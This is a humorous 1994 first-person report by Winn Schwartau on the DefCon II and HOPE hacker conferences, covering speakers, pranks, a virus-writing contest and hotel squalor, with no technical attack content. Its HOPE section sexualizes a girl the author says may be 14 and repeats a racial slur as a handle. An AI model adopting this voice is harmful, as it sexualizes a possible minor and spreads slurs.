up. The edict said he couldn't sell or advertise, but there was no provision stating that he couldn't answer questions from an inquiring mind. Bootleg handed me a CD ROM: Bootleg Presents: DMV - Over 2 Million Oregon Drivers License Records - Over 3 Million Oregon License Plate Records The inside jacket clearly stated that this information was not to be used by any creatively nefarious types for any sort of personal Information Warfare tactics. It warns, Do not use this CD to: - Make phony Licenses - Make phony Titles - Obtain phony I.D. - Harass Politicians, Cops or Journalists - Stalk Celebrities - Get ME in trouble I can come up with at least 1001 other uses for this collection of information that the Oregon authorities are none too happy about. The ones Bootleg outlined never came into my mind. (Heh!) Bootleg acquired the information legally. State officials were kind enough to violate the electronic souls of its citizens by sending Bootleg their driver's information magnetically emblazoned on a 3600 foot long piece of 9 track acetate. Now they want to change the law to reflect "heart felt concern for the privacy of their citizens." Get a clue, or if none's available, buy one from Vanna. Bootleg is moving onto the next 47 states (California and New York don't permit this kind of shenanigans) shortly to make sure that everyone has equal access. Hacking? Of course. Bootleg effectively hacked the Oregon DMV with their blessing and tax payer paid-for assistance. Time to go back to my room while Bootleg and friends spent an evening of apparently unsuccessful whoring around the Strip and Glitter Gulch. A good time was had by all. * * * * * Jeff Moss opened the Sunday morning session with an ominous sermon. "You'll notice that the wet bar is missing from the rear?" It had been their yetserday. Everyone turns around to look. "I gotta pay for the damage . . . " Jeff was not a happy camper. "They have my credit card number and it's almost full. So cool it!" But the show must go on and we had more to learn. Next. Anonymous mailers on the net? Forget about it. No such thing. Anonymous remailers, even if they are in Norway or Finland or some such other country where American information contraband such as child pornography is legal, are only as safe and secure as the people who run it "The FBI can go over any time they want and look up who you are and what kinds of stuff you swallow down your digital throat," one speaker announced. Of course that's ridiculous. The FBI would have to call in the Boy Scouts or Russian Mafia for that kind of operation, but we all knew that anyway. A slight slip of the ad lib tongue. No harm done. I didn't know, until this Sunday, that there were actually real live versions of "Turn Up The Volume" running rampant across the country, impinging their commercial-free low power radio broadcasts into an electromagnetic spectrum owned and operated by the Federal Communications Commission. And, as to be expected, the FCC is trying to put this relatively harmless stations out of business along with Howard Stern and Don Imus. One would think that WABC or KLAC or any other major market stations would little care if a podunk 20 watt radio station was squeezing in between assigned frequencies. And they probably shouldn't. But, as we learned, the Military lent an innocent hand. In support of the hobbies of servicemen, a local San Francisco base commander gave approval for a group of soldiers to establish a small, low power radio station for the base. Good for morale, keep the men out of the bars: you know the bit. But the ballistic missiles went off when the nation's premier rating service, Arbitron, listed KFREE as a top local station in the San Francisco market. "What station KFREE?" "Who the hell are they?" "What the fuck?" Needless to say, KFREE was costing the legitimate radio stations money because advertising rates are based upon the number of listeners not up and peeing during commercials. Since KFREE was ad-free, no contest. Arbitron assumes the rating to relect the existence of a real station - the numbers are there - and the local stations call the FCC and the FCC calls the base and as quick as you can scream, "Feds suck!" KFREE is off the air. Stomp. I was scheduled to speak today, but with the schedule seemingly slipping forward and backward at random haphazard intervals, there was no telling when what would occur. Mark Ludwig, of Virus Writing Contest fame and author of the much touted "Little Black Book of Computer Viruses" Virus gave a less then impassioned speech about the evils of government. "I know most of you don't have any assets other than your computer," Ludwig said to the poverty stricken masses of DefCon II. "But you will, and you want to make sure the government doesn't come crashing down around you whenever they want. They can and will take your life away if it suits them. There is no fourth amendment. Most search and seizures are illegal." And so it went. "Put your money off shore, kids," said Dr. Ludwig the theoretical physicist. "Find a good friendly country will flexible banking laws and the Feds can't get you." "And when the Fed do come for you, make sure that your entire life is on your computer. Rip up the papers after you scan them in. Your all-electronic life cannot be penetrated - especially if you get a case of the forgets. 'Oops, I forgot my password. Oops! I forgot my encryption key. Oops! I forgot my name.'" "Even your VISA and Mastercard accounts should be from overseas. Keep it out of the US and you'll be all the better for it." For those interested in such alternative, Ludwig recommends that you call Mark Nestman: of LPP Ltd. at 800-528-0559 or 702-885-2509. Tell him you want to move your millions of rubbles and dollars and Cyber-credits overseas for safe keeping because the Byzantine Police are at the front door as you speak. Order pamphlet 103. These are the defensive measures we can take protect ourselves against the emerging Police State. But offensive action is also called for, he says. "Help Phil Zimmerman. Send him money for his defense. Then, laugh at the Feds!" Ha ha ha ha. Haha. Hahahahahaha. Ha! ."When they come to the door, just laugh at them." Haha. Hahaha. Haha. "No matter what they do, laugh at them." Hahahahaha. Enough of that, please. If I laugh at 6 husky beer-bellied Cyber-cops who have an arsenal of handguns pointed at my head, they might as well send me to the Group W bench to commiserate with Arlo Guthrie. Peeing would come before laughing. But then again, I'm no longer a grunged out 20 year old who can laugh in the face of the Grim Reaper. "Yes, ossifer, sir. I'm a cyber- crook. I ain't laughing at you in your face, ossifer, sir . . ." I panic easily. Kissing ass well comes from a life long success of quid pro quo'ing my way from situation to situation. "And, now," Master Mark announced, "on to the results and awards for the Annual Virus Writing contest." Ludwig seemed suddenly depressed. "Unfortunately, we only got one legitimate entry." One entry? The media plastered his contest across the media- waves and the National Computer Security Association was planning a tactical nuclear response. One entry? What kind of subversives have 20 year olds turned into anyway? In my day (Yeah, I'm old enough to use that phrase) if we called for a political demonstration thousands would pile through the subway turnstiles to meet a phalanx of well armed police appropriately attired in riot gear. One entry? Come on X-Generation, you can do better than that? No wonder the world's going to shit. Don't have enough trouble from the young-uns. Sheeeeeeesssh! Mark Ludwig's politically incorrect virus writing contest may have been a PR success but it was a business abortion. One entry. Shit. At the NCSA meeting in Washington, rivaling factions battled over how we as an association should respond. "Hang the bastard." "He's what's wrong with world." "Put him in a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week and they'll be able to squeeze him out between the bars." C'mon you fools! Ignore him! Ignore him! If you don't like what he has to say don't egg him on. Ignore him. You want to do what the Feds did to poor Phil Zimmerman and make him a folk hero? Turn a non-event into the lead for the evening news is not the way to make something go away. I loudly advocated that he be treated as a non-entity if the goal was reduction to obscurity. I was right. Super-high priced PR and lobby firms had prepared presentation to wage an all-out attack on Ludwig and his contest. I bet! And who was going to pay for this? Peter Tippitt of Semantech ponied up what I believe amounted to $7,000 to get the pot going. No one else made a firm offer. Can't blame them cause it would have been no more effective than taking out an ad in USA proclaiming that evil is bad. The PR firm would have made their fees, the event would have made even more news and Ludwig would certainly have had to make a judgement and choose from more than one entry. But oddly enough, the one entry did not win. The winner of the Annual Virus Writing Contest was no less than Bob Bales, Executive Director of the NCSA. Not that Bob wrote a program, but is he had, it would be called either Don Quixote or Paranoia, and it would be of the human brain attacking Meme type. The virus is a software equivalent of Prozac to alleviate the suffering in middle-aged males who have no purpose in life other than virus busting. "Is Winn Schwartau here?" Mark asked the audience. I was there. "Yo!" "Would you tell Bob that he's won a plaque, and a $100 check and a full year subscription to the Computer Virus Developments Quarterly." I'm the technology advisor to the NCSA so it was natural request. I told Bob about his 15 minutes of fame at DefCon to which he roared in laughter. "Good! Then I won't have to subscribe myself." I spoke next. Jeff introduced me by saying, "Winn says he doesn't want to speak to an empty room so he's gonna talk now." Some introduction. But, what a great audience! Better than most of the security above-ground starched sphincter tight suit and tie conference audiences I normally get. But then again, I get paid handsomely to address legitimate audiences where I have to be politically correct. At DefCon, insulting people was the last thing I worried about. It was what I focused on, onstage and off. "Hey, kid. Did you ever land Zimmerman in bed?" "You, you, er . . ." "C'mon kid. Give me your best shot." "Your mother . . ." A crowd gathered to see what kind of repartee this little schnook could come up with. "Your mother .. ." C'mon kid. You got it in you. C'mon. "You, she is a . . . uh, . . . mother . . ." and he finally skulked away in sheer embarrassment. Poor kid. When he went to the men's room, men walked out. Poor kid. I don't think he ever figured out it was all a put on. The audience got it, though. Rather than go over what I rambled about for an hour, here comes a blatant plug: Go buy my new book "Information Warfare: Chaos on the Electronic Superhighway." That'll sum it up real nice and neat. But what a great audience. Thanks. Little did I know, though, that I was also on trial. John Markoff of the New York Times was the first to ask, and then a couple of buddies asked and then a lady asked during the Q&A portion of my ad hoc ad lib speech. "How come you did it?" Did what? "How come you flamed Lenny DeCicco?" It turns out that someone adapted my electronic identity and logged on to the WELL in Sausalito, CA and proceeded to post a deep flame against Lenny. Among other none-too-subtle aspersions, 'my' posting accused Lenny of a whole string of crimes of Information Warfare and even out and out theft. Except, it wasn't me. I answered the lady's question with, "It wasn't me, I don't know Lenny and I don't have an account on the WELL." That satisfied everyone except for me. What happened and why? It seems that Lenny's former partner in crime Most- Wanted on the lam federal fugitive computer hacker Kevin Mitnick actually wrote and signed the letter with his initials. Or someone was spoofing him and me at the same time. But why? And why me? It took a couple of days after arriving home from DefCon to learn after extensive conversations with the WELL that my erased account from almost two years ago and then re-erased on June 20 of this year was accidentally turned back on by some mysterious administrative process that I cannot claim to fathom. OK, that's what they said. But perhaps most interesting of the entire Getting Spoofed incident was a single comment that Pei Chen, sysop of the WELL said to me while I complained about how such an awful anti-social attack was clearly reprehensible. Oh, it's simple, she said. "We have no security." Whooaaaahhh! The WELL? No security? I love it. I absolutely love it. Major service provider, no security. Go get 'em cowboy. The only other speaker I wanted to see was Peter Beruk, chief litigator for the Software Publisher's Association. This is the Big Software Company sponsored organization which attempts to privately interdict illegal software distribution as a prelude for both civil and criminal prosecutions. And with this group of digital anarchists, no less. The SPA scrounges around 1600 private BBS's to see who's making illicit copies of Microsoft Word or Quattro For Weanies or Bulgarian for Bimbos or other legitimate software that the publishers would rather receive their due income from then being stolen. "Which boards are you on?" "That would be telling." Big grin and laughs. "Is your BBS secure?" A challenge in the making. "Sure is." "Is that an offer to see if we can break in?" Challenge made. "Ahem, cough, cough." Challenge denied. "What name do you use on the boards?" Idiot question that deserves an idiot answer. "Fred." Laughs. "You mean you have a full time guy to download software from boards to see if it's legal or not?" "Yup." "So, you pay people to commit felonies?" Astutely stupid question. "We have permission." "Why should we have to pay rip-off corporations too much money to use really shitty software?" "So don't buy it." "We don't. It's so shitty that it's barely worth stealing." "So don't steal it." "Just want to check it out, dude." "Scum sucking imperialists are making all of the money. The software designers are getting ripped off by the big software bureaucracies. Power to the people." Every generation goes through this naively innocent berating of capitalism. It doesn't make them Communists (in 1950 it did), just not full fledged capitalist pigs themselves yet. Soon come. Vis a vis Ludwig's comment on the asset-deprived audience. Soon come, man. "We go after BBS's that store illegal software." "So you're gonna put Compuserve in jail?" Big, big applause. Despite the openly verbal animosity between the free-ware believers and the Chief Software Cop, the spirited and entertaining disagreements maintained a healthy good natured tone that well exceed Peter's time limit, as DefCon II was coming to a close. It was time for one more stand up comedy attempt by a long haired bandanna wearing hippie/hacker/phreak who was not quite up to the job. "OK, guys. We've had some fun at the Feds expense. They're people, too. So, from now on, it's Hug a Fed. Go on, find a fed and go up to him or her and big them a great big bear hug full of love." The Feds that had been busted were gone. The ones still successfully undercover weren't about to blow it for quick feel from a horny teenager. Next. The Cliff Stoll doll with an assortment of accessory yo- yos was a popular item. It was thrown pell-mell into the crowds who leapt at it with a vengeance like a baseball bleachers section awaiting the 61st home run. "There used to be a Wife of Cliff Stoll doll, but no one's seen it in two years." Cliff is strange. I don't know if he's that strange, but it was a funny bit. "Then we have the LoD/MoD action figure set starring Erik Bloodaxe and Phiber Optik." GI Joe action set gone underground. Corny, but appreciated as hundreds of bodies dove to catch the plastic relics tossed from the stage. If anything, an anti-climatic end to an otherwise highly informative and educational conference. I can hardly wait till next year when, after word gets out, DefCon III will be attended by thousands of hackers and cops and narks who will try to replay the Summer of Cyber-Love '94 for a sequel. * * * * * More than anything I wanted to get away from the Sahara. Away from its nauseatingly chromatic carpets, it's hundreds of surveillance cameras, and most of all, away from its exploding toilets. We decided to play, and play we did at the new Luxor Hotel which is an amazing pyramid with 4000+ rooms. There are no elevators as in a pyramid 'going up' is kind of useless, so Inclinators take passengers up the 30 some odd floors to hallways which ring around the impossibly huge hollowed out pyramid shaped atrium. This was play land. And for three hours we played and played and went to dumb shows that attract mid-western mamas from Benign, Ohio, alighting in Vegas for their annual RV pilgrimage. But we went and enjoyed none the less. The "Live TV" show was anything but live except for lovely Susan who hosted us into the ersatz TV station. Her job is to look pretty, sound pretty and warm up the crowd for an over budget, overproduced schmaltz driven video projection that was to make us all feel like we were on stage with Dave. Letterman, that is. The effect does not work. But we enjoyed ourselves, anyway. "Everyone here on vacation?" "No!" I yelled out. Poor Susan was stunned. No? Why else would you be here? "What are you doing?" The TV audience of 500 was looking our way. Between the five of us we had a million dollars (give or take) of electronic wizardry stuffed around us, beneath us and in our laps. "Working." Gee, I'm quick. "What do you do?" Susan asked with a straight face. I bet she expected something like gas pumper, or nocturnal mortuary fornicator or 7/11 clerk. "We're hacking for Jesus. This is Cyber Christ!" I said pointing at Erik Bloodaxe. Silence. Dead silence again. Sleep with Phil Zimmerman silence. Except for us. We giggled like school boys. Psyche. "Ah, . . . that's nice." That was all she could come up with: That's nice. So much for ad libbing or deviating from the script. But the TV audience enjoyed it. A whole lot. They finally figured out it was put on. Not every one from the Mid- West is as stupid as they all pretend to be. Then it was time to get sick. VR rides do me in, but not to be publicly humiliated by my 20- something cohorts (and Mike Peros with whom I had to travel yet another 2000 miles that night) I jumped right into an F-14 simulator which rotated 360 degrees on two gimbals for an infinite variety of nauseousness. "Oh, shit!" I yelled as I propelled myself forward and around and sideways with sufficient g-force to disgorge even the most delectable meal. "Oh, shit." I had reversed the throttle and was now spinning end over end backwards. My inner ear was getting my stomach sick. "Oh, shit." Out of the corner of my eyes my four pals were doubled over in laughter. Had I barfed yet and not known it? God, I hope not. "Oh, shit." I came to a dead standstill, the video screen showed me plummeting to earth at escape velocity and I pushed the throttle forward as roughly as I could. An innate survival instinct came in to play. "Oh, shit!" The virtual aircraft carrier came into sight and after almost 2 minutes of high speed rotating revulsion, I was expected to land this spinning F-14 on a thimble in the ocean. Right. I tried, and damned if I didn't make it. I have no idea how, but I got an extra 34,000 points for a safe landing. 120 seconds. Ding. Time's up. I got out of the simulator and spilled right onto the floor; one 42 year old pile of humanity who had navigated nausea but whose balance was totally beyond repair. "Could anyone hear me?" I asked from my knees. "They were selling tickets." "Do I get my money back?" Onto the VR race cars. I really thought I'd throw up to the amusement of a thousand onlookers. Hacking then phreaking then flying and now driving. I put the pedal to the metal and crashed. The huge video display has me tipping end over end and the screen is shaking and the car I'm driving is shuddering violently but my brain can't compute it all. I'm gonna wretch, I just know it. But I keep on driving, decidedly last against people who haven't been handicapped with an inner ear so sensitive I get dizzy when I watch a 5" black and white TV. We tilted out of there and alas, it was time to find a 200,000 pound of metal to glide me home. It was damn good thing I hadn't eaten before VR Land, but I wolfed down $3 hot dogs at the airport knowing full well that whatever they served on the plane would be a thousand times worse. So Mike and I munched, leaving Cyber Christ and friends to battle the press and the stars at the opening of Planet Hollywood at Caesar's Palace. And then an unexpected surprise. Lisa and friend; our first class objects of flirtation from the outbound trip which seemed like a month ago, appeared. But we were all so wiped out that a continent of innuendo turned into a series of short cat naps. We got a few flirts in, but nothing to write home about. Red Eye flights are just not what they're cracked up to be. As I crawled into bed at something like 7AM Eastern, my wife awoke enough to ask the perennial wife question. "What did you do all weekend?" I, in turn, gave her the usual husbandly response. "Oh, nothing. Good night, Gracie." * * * * * (C) 1994 Winn Schwartau Winn Schwartau is an information security consultant, lecturer and, obviously, a writer. Please go buy his new book: "Information Warfare: Chaos on the Electronic Superhighway." Available at book stores everywhere. Winn can be reached at: Voice: 813.393.6600 or E-mail: P00506@Psilink.com Notice: This article is free, and the author encourages responsible widespread electronic distribution of the document in full, not piecemeal. No fees may be charged for its use. For hard copy print rights, please contact the author and I'll make you an offer you can't refuse. @HWA 41.0 Cyber-Christ takes a byte out of the big apple, Winn Schwartau at HOPE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cyber Christ Bites The Big Apple HOPE - Hackers On Planet Earth, New York City - August 13-14, 1994 (C) 1994 Winn Schwartau by Winn Schwartau (This is Part II of the ongoing Cyber Christ series. Part I, "Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July 22-24, 1994 is available all over the 'Net.) Las Vegas is a miserable place, and with a nasty cold no less; it took me three weeks of inhaling salt water and sand at the beach to finally dry up the post nasal drip after my jaunt to DefCon II. My ears returned to normal so that I no longer had to answer every question with an old Jewish man's "Eh?" while fondling my lobes for better reception. New York had to be better. Emmanuel Goldstein -aka Eric Corely - or is it the other way around? is the host of HOPE, Hackers on Planet Earth, a celebration of his successfully publishing 2600 - The Hackers Quarterly for ten years without getting jailed, shot or worse. For as Congressman Ed Markey said to Eric/Emmanuel in a Congressional hearing last year, and I paraphrase, 2600 is no more than a handbook for hacking (comparable obviously to a terrorist handbook for blowing up the World Trade Center) for which Eric/Emmanuel should be properly vilified, countenanced and then drawn and quartered on Letterman's Stupid Pet Tricks. Ed and Eric/Emmanuel obviously have little room for negotiation and I frankly enjoyed watching their Congressional movie where communication was at a virtual standstill: and neither side understood the viewpoints or positions of the other. But Ed is from Baaahhhsten, and Eric/Emmanuel is from New York, and HOPE will take place in the Hotel Filthadelphia, straight across the street from Pennsylvania Station in beautiful downtown fast-food-before-they-mug-you 34th street, right around the corner from clean-the- streets-its-Thanksgiving Herald Square. Geography notwithstanding, HOPE promised to be a more iconoclastic gathering than that of DefCon II. First off, to set the record straight, I am a New Yorker. No matter that I escaped in 1981 for the sunny beaches of California for 7 years, and then moved to the Great State of the Legally Stupid for four more (Tennessee); no matter that I now live on the Gulf Coast of Florida where the water temperature never dips below a chilly 98 degrees; I am and always will be a New Yorker. It took me the better part of a decade of living away from New York to come to that undeniable and inescapable conclusion: Once a New Yorker, always a New Yorker. Not that that makes my wife any the happier. "You are so rude. You love to argue. Confrontation is your middle name." Yeah, so what's your point? You see, for a true New Yorker these aren't insults to be re- regurgitated at the mental moron who attempts to combat us in a battle of wits yet enters the ring unarmed; these are mere tru- isms as seen by someone who views the world in black and white, not black, white and New York. Case in point. I used to commute into Manhattan from the Westchester County suburb of Ossining where I lived 47 feet from the walls of Sing Sing prison (no shit!). Overlooking the wide expanse of the Hudson River from my aerie several hundred feet above, the only disquieting aspect of that location were the enormously deafening thunderclaps which resounded a hundred and one times between the cliffs on either side of the river. Then there was the occasional escapee- alarm from the prison. . So, it was my daily New York regimen to take the 8:15 into the city. If the train's on time I'll get to work by nine . . . Grand Central Station - the grand old landmark thankfully saved by the late Jackie O. - is the nexus for a few hundred million commuters who congregate in New York Shitty for no other reason that to collect a paycheck to afford blood pressure medicine. You have to understand that New York is different. Imagine, picture in your mind: nothing is so endearing as to watch thousands of briefcase carrying suits scrambling like ants in a Gary Larson cartoon for the nearest taxi, all the while greeting their neighbors with the prototypical New York G'day! With both fists high in the air, middle fingers locked into erect prominence, a cacophonous chorus of "Good Fucking Morning" brightens the day of a true New Yorker. His bloodshot eyes instantly clear, the blood pressure sinks by 50% and already the first conflict of the day has been waged and won. Welcome to the Big Apple, and remember never, ever, to say, "Have a Nice Day." Oh, no. Never. So HOPE was bound to be radically different from Vegas's DefCon II, if only for the setting. But, I expected hard core. The European contingent will be there, as will Israel and South America and even the Far East. All told, I am told, 1000 or more are expected. And again, as at DefCon II, I am to speak, but Eric/Emmanuel never told me about what, when, or any of the other niceties that go along with this thing we call a schedule. * * * * * God, I hate rushing. Leaving Vienna at 3:15 for a 4PM Amtrak "put your life in their hands" three hour trip to New York is not for the faint of heart. My rented Hyundai four cylinder limousine wound up like a sewing machine to 9,600 RPM and hydroplaned the bone dry route 66 into the pot holed, traffic hell of Friday afternoon Washington, DC. Twelve minutes to spare. I made the 23 mile trip is something less than three minutes and bounded into the Budget rental return, decelerated to impulse power and let my brick and lead filled suitcase drop to the pavement with a dent and a thud. "Send me the bill," I hollered at the attendant. Never mind that Budget doesn't offer express service like real car rental companies. "Just send me the bill!" and I was off. Eight minute to spare. Schlepp, schlepp. Heavy, heavy. Holy shit! Look at the line for tickets and I had reservations. "Is this the line for the four o'clock to New York?" Pant, breathless. "Yeah." She never looked up. "Will they hold the train?" "No." A resoundingly rude no at that. Panic gene takes over. "What about the self-ticketing computer?" I said pointing at the self ticketing computer. "Do you have a reservation?" "Yup." Maybe there is a God. "Won't help you." "What?" Nothing. "What do you mean won't help?" "Computer's broken." Criminy! I have 4 minutes and here's this over-paid over-attituded Amtrak employee who thinks she's the echo of Whoopi Goldberg. "The line's over there." Have you ever begged? I mean really begged? Well I have. "Are you waiting for the four?" "Can I slip ahead?" "Are you in a death defying hurry?" "I'll give you a dime for your spot in line." "You are so pretty for 76, ma'am. Can I sneak ahead?" Tears work. Two excruciating minutes to go. I bounced ahead of everyone in a line the length of the Great Wall of China, got my tickets and tore ass through Union Station The closing gate missed me but caught the suitcase costing me yet more time as I attempted to disgorge my now-shattered valise from the fork-lift- like spikes which protect the trains from late-coming commuters. The rubber edged doors on the train itself were kinder and gentler, but at this point, screw it. It was Evian and Fritos for the next three hours. * * * * * Promises tend to be lies. The check is in the mail; Dan Quayle will learn to spell; I won't raise taxes. I wonder about HOPE. "It's going to be Bust Central," said one prominent hacker who threatened me with electronic assassination if I used his name. "Emmanuel will kill me." Apparently the authorities-who-be are going to be there in force. "They want to see if Corrupt or any of the MoD crew stay after dark, then Zap! Back to jail. (giggle, giggle.) I want to see that." Will Mitnick show up? I'd like to talk to that boy. A thousand hackers in one place and Eric/Emmanuel egging on the Feds to do something stupid. Agent Steal will be there, or registered at least, and half of the folks I know going are using aliases. "I'd like a room please." "Yessir. Name?" "Monkey Meat." "Is that your first or last name?" "First." "Last name?" "Dilithium Crystal." "Could you spell that?" Now: I know the Hotel Pennsylvania. It used to be the high class Statler Hilton until Mr. Hilton himself decided that the place was beyond hope. "Sell it or scuttle it." They sold and thus begat the hotel Filthadelphia. I stayed here once in 1989 and it was a cesspool then. I wondered why the Farsi-fluent bellhop wouldn't tell me how bad the damage was from the fire bombed 12th floor. The carpets were the same dingy, once upon a time colorful, drab as I remembered. And, I always have a bit of trouble with a hotel who puts a security check by the elevator bank. Gives you the warm and fuzzies that make you want to come back right away. I saved $2 because none of the bell hops noticed I needed help, but then again, it wouldn't have mattered for there was no way he and I and my luggage were going to fit inside of what the hotel euphemistically refers to as a 'room'. Closet would be kind but still inaccurate. I think the word, ah, '$95 a night slum' might still be overly generous. Let's try . . . ah ha! the room that almost survived the fire bombing. Yeah, that's the ticket. The walls were pealing. Long strips of yellowed antique wallpaper embellished the flatness of the walls as they curled towards the floor and windows. The chunks of dried glue decorated the pastel gray with texture and the water stains from I know not where slithered their way to the soggy carpet in fractal patterned rivulets. I stood in awe at early funk motif that the Hotel Filthadelphia chose in honor of my attendance at HOPE. But, no matter how bad my room was, at least it was bachelor clean. (Ask your significant other what that means. . .) In one hacker's room no bigger than mine I counted 13 sleeping bags lying amongst the growing mold at the intersection of the drenched wallboard and putrefying carpet shreds. (God, I love going to hacker conferences! It's not that I like Hyatt's and Hilton' all that much: I do prefer the smaller facilities, but, I am sad to admit, clean counts at my age.). My nose did not have to venture towards the floor to be aware that the Hotel Filthadelphia was engaging in top secret exobiological government experiments bent on determining their communicability and infection factor. The top floor of the Hotel Filthadelphia - the 18th - was the place for HOPE, except the elevator door wouldn't open. The inner door did, but even with the combined strength of my personal crowbar (a New York defensive measure only; I never use it at home) and three roughians with a bad case of Mexican Claustrophobia, we never got the door open. The guard in the lobby was a big help. "Try again." Damned if he didn't know his elevators and I emerged into the pre-HOPE chaos of preparing for a conference. About 100 hackers lounged around in varying forms of disarray - Hey Rop! Rop Gongrijjp editor of the Dutch Hacktic is a both a friend and an occasional source of stimulating argument. Smart as a whip, I don't always agree with him, though, the above- ground security types ought to talk to him for a clear, concise and coherent description of the whys and wherefores of hacking. Hey Emmanuel! Hey Strat! Hey Garbage Heap! Hey Erikb! Hey to lots of folks. Is that you Supernigger? And Julio? I was surprised. I knew a lot more of these guys that I thought I did. Some indicted, some unindicted, some mere sympathizers and other techno-freaks who enjoy a weekend with other techno-freaks. Security dudes - get hip! Contact your local hacker and make friends. You'll be glad you did. From behind - got me. My adrenaline went into super-saturated mode as I was grabbed. I turned and it was . . . Ben. Ben is a hugger. "I just wanted to hug you," he said sweetly but without the humorous sexually deviant connotation that occurred during Novocain's offer to let Phil Zimmerman sleep with him in Las Vegas. I smiled a crooked smile. "Yeah, right." Woodstock '94 was a mere 120 miles away . . .maybe there was a psychic connection. But Ben was being sincere. He was hugging everyone. Everyone. At 17, he really believes that hugging and hacking are next to Godliness. Boy does he have surprise coming the first time his mortgage is late. Keep hugging while you have the chance, Ben. Assorted cases of Zima (the disgusting Polish is-this-really-lime flavored beer of choice by those without taste buds) appeared, but anyone over the age of 21 drank Bud. What about the 12 year olds drinking? And the 18 year olds? And the 16 year olds? "Rop, I don't think you need to give the hotel an excuse to bust you guys outta here." Me, fatherly and responsible? Stranger things have happened. The beer was gone. I'm not a teetotaler, but I didn't want my weekend going up in flames because of some trashed 16 year old puking on an Irani ambassador in the lobby. No reason to test fate. * * * * * Nothing worked, but that's normal. Rop had set up HEU (Hacking at the End of the Universe) in Holland last year with a single length of 800m ethernet. (That's meter for the Americans: about 2625 ft.) HOPE, though was different. The Hotel Filthadelphia's switchboard and phone systems crashed every half hour or so which doesn't do a lot for the health of 28.8 slip lines. The object of the exercise was seemingly simple: plug together about 20 terminals into a terminal server connected to Hope.Com and let 'em go at it. Provide 'net access and, to the lucky winner of the crack-the-hopenet server (root) the keys to a 1994 Corvette! You heard it right! For breaking into root of their allegedly secure server, the folks at 2600 are giving away keys to a 1994 Corvette. They don't know where the car is, just the keys. But they will give you the car's last known location . . . or was it $50 in cash? Erikb - Chris Goggans - showed up late Friday night in disguise: a baseball cap over his nearly waist length dirty blond hair. "He's here!" one could hear being muttered. "He had the balls to show up!" "He's gonna get his ass kicked to a pulp." "So you did come . . . I was afraid they'd intimidated you to stay in Texas." No way! "Why tell the enemy what your plans are." Even the 50's- something ex- amphetamine-dealer turned reseller of public-records Bootleg didn't know Goggans was going to be there. But the multiple fans of Erikb, (a strong resemblance to Cyber Christ if he do say so himself) were a-mighty proud to see him. This stunning Asian girl with skin too soft to touch (maybe she was 14, maybe she was 25) looked at Erikb by the message board. "You're," she pointed in disbelief "Erikb?" Chris nods, getting arrogantly used to the respectful adulation. Yeah, that's me, to which the lady/girl/woman instantly replied, "You're such an asshole." Smile, wide smile, hug, kiss, big kiss. Erikb revels in the attention and hundreds of horny hackers jealously look on. Friday night was more of an experience - a Baba Ram Dass-like Be Here Now experience - with mellow being the operative word. The hotel had apparently sacrificed 20,000 square feet of its penthouse to hackers, but it was obvious to see they really didn't give a damn if the whole floor got trashed. Ceiling panels dripped from their 12 foot lofts making a scorched Shuttle underbelly look pristine. What a cesspool! I swear nothing had been done to the decorative environs since the day Kennedy was shot. But kudos to Emmanuel for finding a centrally located cesspool that undoubtedly gave him one hell of a deal. I think it would be a big mistake to hold a hacker conference at the Plaza or some such snooty overly-self-indulgent denizen of the rich. Filth sort of lends credibility to an event that otherwise seeks notoriety. I didn't want to take up too much of Emmanuel's and Rop's time - they were in setup panic - so it was off to the netherworld until noon. That's when a civilized Con begins. * * * * * I dared to go outside; it was about 11AM and I was in search of the perfect New York breakfast: a greasy spoon that serves coffee as tough as tree bark and a catatonia inducing egg and bacon sandwich. Munch, munch, munch on that coffee. I'd forgotten how many beggars hang out on the corner of 33rd and 7th, all armed with the same words, "how about a handout, Winn?" How the hell do they know my name? "Whatever you give will come back to you double and triple . . . please man, I gotta eat." It is sad, but John Paul Getty I ain't. As I munched on my coffee and sipped my runny egg-sandwich I noticed that right in front of the runny-egg-sandwich place sat a Ford Econoline van. Nice van. Nice phone company van. What are they doing here? Oh, yeah, the hackers need lines and the switchboard is down. Of course, the phone company is here. But, what's that? Hello? A Hacker playing in the phone van? I recognize you! You work with Emmanuel. How? He's robbing it. Not robbing, maybe borrowing. The ersatz telephone van could have fooled anyone - even me, a color blind quasi-techno- weanie to yell "Yo! Ma Bell!" But, upon not-too-closer inspection, the TPC (The Phone Company) van was in fact a 2600 van - straight from the minds of Emmanuel and friends. Impeccable! The telephone bell in a circle logo is, in this case, connected via cable to a hacker at a keyboard. The commercial plates add an additional air of respectability to the whole image. It works. * * * * * Up to HOPE - egg sandwich and all. The keynote speech was to be provided courtesy of the Man in Blue. Scheduled for noon, things were getting off to a late start. The media (who were there in droves, eat your heart out CSI) converged on the MIB to see who and why someone of his stature would (gasp!) appear/speak at a funky-downtown hotel filled with the scourges of Cyberspace. I didn't see if Ben hugged the MIB, but I would understand if he didn't. Few people knew him or suspected what size of Jim-Carey-MASK arsenal might suddenly appear if a passive hug were accidentally interpreted as being too aggressive. The MIB is imposing and Ben too shy. The media can ask some dumb questions and write some dumb articles because they spend 12 1/2 minutes trying to understand an entire culture. Can't do that fellows! The MIB, though, knows hackers and is learning about them more and more; and since he is respectable, the media asks him about hackers. What are hackers? Why are YOU here, Mr. MIB? "Because they have a lot to offer. They are the future," the Man In Blue said over and over. Interview after interview - how time flies when you're having fun - and the lights and cameras are rolling from NBC and PIX and CNN and assorted other channels and magazines. At 12:55 chaos had not settled down to regimented disorganization and the MIB was getting antsy. After all, he was a military man and 55 minutes off schedule: Egad! Take charge. The MIB stood on a chair and hollered to the 700+ hacker phreaks in the demonstration ballroom, "Hey! It's starting. Let's go the theater and get rocking! Follow me." He leaned over to me: "Do you know where the room is?" "Sure, follow me." "Everyone follow, c'mon," yelled the MIB. "I'm going to get started in exactly three minutes," and three minutes he meant. Despite the fact that I got lost in a hallway and had hundreds of followers following my missteps and the MIB yelling at me for getting lost in a room with only two doors, we did make the main hall, and within 90 seconds he took over the podium and began speaking. "I bet you've always wanted to ask a spy a few questions. Here's your chance. But let me say that the United States intelligence community needs help and you guys are part of the solution." The MIB was impeccably dressed in his pin stripe with only traces of a Hackers 80 T-shirt leaking through his starched white dress shirt. The MIB is no less than Robert Steele, ex-CIA type spy, senior civilian in Marine Corps Intelligence and now the President of Open Source Solutions, Inc. He got these guys (and gals) going. Robert doesn't mince words and that's why as he puts it, he's "been adopted by the hackers." At his 